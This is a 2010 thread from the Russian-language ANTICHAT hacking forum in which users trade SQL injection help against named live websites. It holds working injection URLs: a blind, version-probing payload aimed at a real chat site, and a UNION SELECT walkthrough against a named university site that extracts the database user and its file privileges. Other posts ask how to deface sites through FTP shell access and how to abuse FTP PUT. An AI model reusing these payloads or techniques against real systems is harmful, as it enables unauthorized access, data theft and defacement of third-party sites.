HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14241  
Старый 06.07.2010, 20:33
BlackFan
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442

Репутация: 41
По умолчанию

Цитата:
Сообщение от durito  
durito said:
http://www.portugal-tchat.com/host_mes_images/view/870+union+select+1,2,3,4,5,6,7,8,9,10,11
подскажите, куды копать дальше?
Как вариант...

http://www.portugal-tchat.com/host_mes_images/view/870+and+if(mid(version(),1,1)=5,1,(select+1+union+ select+2))

Условие выполняется - картинка, не выполняется - error.

Возможно все гораздо проще можно сделать...
 
Ответить с цитированием

  #14242  
Старый 06.07.2010, 22:01
Sams
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863

Репутация: 80
По умолчанию

Ребята, подскажи по поводу использования UPDATE в инъекциях.

Значит есть инъекция

UNION+SELECT+1,test_data,3+FROM+test_table+--+

пробую изменить значение test_data допустим на 12345 вот таким запросом

UNION+UPDATE+test_table+SET+test_data='12345'+WHER E+test_data2='lol'+--+

в результате выбивает ошибку вида

Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION+UPDATE+test_table+SET+test_data='12345'+WHE RE+test_data2='lol'+--+' at line 1
пробовал заменять значение на HEX кодировку, то есть вместо ='12345' тулил =0x3132333435. Результат - опять таки ошибка.

Подскажите, может быть я не так использую UPDATE, и всё дело в неправильном синтаксисе? Заранее благодарен.
 
Ответить с цитированием

  #14243  
Старый 06.07.2010, 22:03
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Если запрсос select, значит SELECT, нельзя insert, update, и т.п., можно только выборку из бд делать.
 
Ответить с цитированием

  #14244  
Старый 06.07.2010, 22:18
firstq2
Guest
Сообщений: n/a
Провел на форуме:
218

Репутация: 0
По умолчанию

А если у нас основной запрос вроде INSERT+INTO+test_table+(test_data)+VALUES+(lol), то UNION INSERT или UNION UPDATE прокатит?
 
Ответить с цитированием

  #14245  
Старый 06.07.2010, 22:45
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Нет. Вы вообще вкурсе что делает union?
 
Ответить с цитированием

  #14246  
Старый 06.07.2010, 22:47
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

мдяс, думаю на лето надо закрыть данный раздел..так как 99% вопросы по скулям..причем стандартные вопросы, ответы на которые можно спокойно найти на форуме потратив 30 секунд
 
Ответить с цитированием

  #14247  
Старый 07.07.2010, 11:01
haito
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441

Репутация: 0
По умолчанию

Этот сайт позволяет file_priv, но мы можем заполнить оболочку?

http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201, file_priv,3,4,5,6,7,8,9%20from%20mysql.user+--+
 
Ответить с цитированием

  #14248  
Старый 07.07.2010, 12:22
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

как получив шелл на фтп, можно заменить все шаблоны в БАЗЕ данных на вредноносный код(дефейс)?
 
Ответить с цитированием

  #14249  
Старый 07.07.2010, 13:08
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от haito  
haito said:
Этот сайт позволяет file_priv, но мы можем заполнить оболочку?
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201, file_priv,3,4,5,6,7,8,9%20from%20mysql.user+--+
У твоего пользователя нету file_priv:

Код:
Code:
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9+--+
Получаем юзера - DCE. Смотрим дальше:

Код:
Code:
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,concat_ws(0x3a,user,file_priv),'3',4,5,6,7,8,9%20from%20mysql.user+limit+5,1+--+
Результат:

Код:
Code:
DCE:N
 
Ответить с цитированием

  #14250  
Старый 07.07.2010, 14:51
MAQUEEN
Постоянный
Регистрация: 27.09.2008
Сообщений: 469
Провел на форуме:
784549

Репутация: 309
Отправить сообщение для MAQUEEN с помощью ICQ Отправить сообщение для MAQUEEN с помощью AIM Отправить сообщение для MAQUEEN с помощью Yahoo
По умолчанию

как использовать " PUT " уязвимость, в FTP ?..... (удаленный сервер)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ